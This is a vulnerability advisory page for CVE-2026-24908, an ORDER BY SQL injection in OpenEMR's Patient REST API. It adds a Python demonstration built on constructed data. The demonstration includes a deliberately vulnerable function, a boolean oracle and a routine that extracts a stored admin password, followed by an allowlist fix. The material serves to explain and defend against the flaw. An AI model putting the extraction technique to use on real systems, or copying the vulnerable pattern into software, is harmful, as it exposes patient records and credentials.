CVE-2026-24908
Published: 25 February 2026
Summary
CVE-2026-24908 is a critical-severity SQL injection (CWE-89) vulnerability in OpenEMR (listed as vendor Open-Emr, product Openemr). Its CVSS base score is 9.9 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Privilege Escalation (T1068), reached through Exploit Public-Facing Application (T1190). The CVE is ranked at the 0.0th percentile by exploit likelihood (below the median), is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced; the low percentile should be read alongside that proof-of-concept and the 9.9 score, not as a reason to defer patching.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): directly mandates validation of user-supplied inputs such as the `_sort` parameter before they reach the Patient REST API's query builder, and enforces restrictions on information inputs, here whitelisting the permitted sort field names, so that arbitrary SQL cannot be injected through `_sort`.
- SI-2 (Flaw Remediation): requires timely identification, reporting, and correction of the SQL injection flaw, here by upgrading to OpenEMR version 8.0.0, which adds proper input validation and identifier escaping in the affected endpoint.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The injection point is a public-facing REST API, so reaching it is Exploit Public-Facing Application (T1190). Because any authenticated, low-privileged API user can run arbitrary SQL, the outcome is escalation from a limited API role to full database access and credential compromise, mapped here to Exploitation for Privilege Escalation (T1068).
NVD Description
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries through the `_sort` parameter. This could potentially lead to database access, PHI (Protected Health Information) exposure, and credential compromise. The issue occurs when user-supplied sort field names are used in ORDER BY clauses without proper validation or identifier escaping. Version 8.0.0 fixes the issue.
Deeper analysis
CVE-2026-24908 is an SQL injection vulnerability (CWE-89) in OpenEMR, a free and open-source electronic health records and medical practice management application, affecting versions prior to 8.0.0. The flaw is in the Patient REST API endpoint: the value of the `_sort` parameter is a sort field name that the endpoint places directly into an ORDER BY clause without validating it against the set of sortable columns and without escaping it as an identifier, so an authenticated user with API access can supply an arbitrary SQL expression in place of a column name. The vulnerability carries a CVSS v3.1 base score of 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).
An attacker with low-privilege authenticated access to the API can exploit this remotely with low complexity and no user interaction required. Successful exploitation enables execution of arbitrary SQL queries, potentially granting full database access, exposure of Protected Health Information (PHI), and compromise of credentials stored in the database.
The OpenEMR security advisory (GHSA-rcc2-45v3-qmqm) and associated commit (943e23cad6e979f87cdf168807fce2a7b32dd194) confirm that upgrading to version 8.0.0 resolves the issue through proper input validation and escaping in the affected endpoint.
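The following Python example is added here to illustrate the flaw class the NVD description and the analysis above describe, and the whitelist (allowlist) mitigation listed under SI-10. It is not OpenEMR code and does not reproduce the referenced proof-of-concept: the table and column names (`patient_data`, `pid`, `fname`, `lname`, `DOB`, and a `users` table with a `password` column), the FHIR-style `-field` convention for descending sort in `_sort`, the sample rows and the in-memory SQLite database are all constructed assumptions. The vulnerable function pastes the sort value into ORDER BY exactly as the advisory describes; the oracle and extraction functions show why that is enough for credential compromise even though ORDER BY never returns the injected expression's value; the hardened functions build the clause only from a fixed mapping of API sort names to columns.

```python
"""Added example: ORDER BY injection through a sort parameter, and an
allowlist-based fix. Not OpenEMR code; schema, column names and data are
constructed for illustration."""
import sqlite3

# Constructed sample rows (not real PHI).
PATIENTS = [
    (1, "Alice", "Zed", "1980-01-01"),
    (2, "Bob", "Young", "1975-05-05"),
    (3, "Carol", "Xu", "1990-09-09"),
]


def make_db():
    """In-memory SQLite database standing in for the EHR database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patient_data (pid INTEGER, fname TEXT, lname TEXT, DOB TEXT)")
    conn.executemany("INSERT INTO patient_data VALUES (?, ?, ?, ?)", PATIENTS)
    # Hypothetical credential table: what an attacker reaches once ORDER BY is injectable.
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'hunter2')")
    conn.commit()
    return conn


# --- Vulnerable pattern (CWE-89): the sort field name is pasted into ORDER BY ---

def list_patients_vulnerable(conn, sort):
    """Deliberately vulnerable: `sort` comes straight from the request."""
    sql = f"SELECT pid, fname, lname FROM patient_data ORDER BY {sort}"
    return conn.execute(sql).fetchall()


def oracle_vulnerable(conn, condition):
    """Boolean oracle: a CASE expression in the sort value flips row order
    depending on an attacker-chosen SQL condition, so the response order leaks one bit."""
    sort = f"(CASE WHEN ({condition}) THEN pid ELSE -pid END)"
    rows = list_patients_vulnerable(conn, sort)
    return rows[0][0] == 1  # ascending pid order means the condition held


def extract_admin_password(conn, max_len=32):
    """Recover a stored credential one character at a time through the oracle."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = f"(SELECT substr(password, {pos}, 1) FROM users WHERE username = 'admin') = '{ch}'"
            if oracle_vulnerable(conn, cond):
                secret += ch
                break
        else:
            break  # no character matched: end of the value
    return secret


# --- Hardened pattern: allowlist API sort names, map to fixed columns, quote identifiers ---

# API-visible sort name -> real column. Only these keys are ever accepted.
SORT_FIELDS = {"id": "pid", "name": "lname", "birthdate": "DOB"}


class InvalidSort(ValueError):
    """Raised for any sort value that is not an allowlisted field."""


def build_order_by(sort):
    """Turn a comma-separated sort value (leading '-' for descending) into an
    ORDER BY clause. Column text comes only from SORT_FIELDS, never from the request."""
    clauses = []
    for item in sort.split(","):
        item = item.strip()
        desc = item.startswith("-")
        key = item[1:] if desc else item
        if key not in SORT_FIELDS:
            raise InvalidSort(f"unsupported sort field: {key!r}")
        clauses.append(f'"{SORT_FIELDS[key]}" {"DESC" if desc else "ASC"}')
    return "ORDER BY " + ", ".join(clauses)


def sort_is_accepted(sort):
    """True if `sort` passes the allowlist, False otherwise."""
    try:
        build_order_by(sort)
        return True
    except InvalidSort:
        return False


def list_patients_hardened(conn, sort):
    """Same query, but the ORDER BY clause is built from the allowlist."""
    sql = "SELECT pid, fname, lname FROM patient_data " + build_order_by(sort)
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable endpoint:", extract_admin_password(db))
    print("hardened, sort=-name:", list_patients_hardened(db, "-name"))
    print("hardened rejects injection:", not sort_is_accepted("(CASE WHEN 1 THEN pid ELSE -pid END)"))
```

The design point is that the hardened version never escapes the user's string at all: the request only selects a key in `SORT_FIELDS`, and the identifier that reaches the SQL text is a constant from the mapping. Identifier quoting is still applied to that constant as defence in depth, but it is not what keeps the injection out. A request for an unknown field fails closed with an error rather than being passed through, which is the behaviour a reviewer should look for when checking the 8.0.0 fix.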
Details
- CWE(s)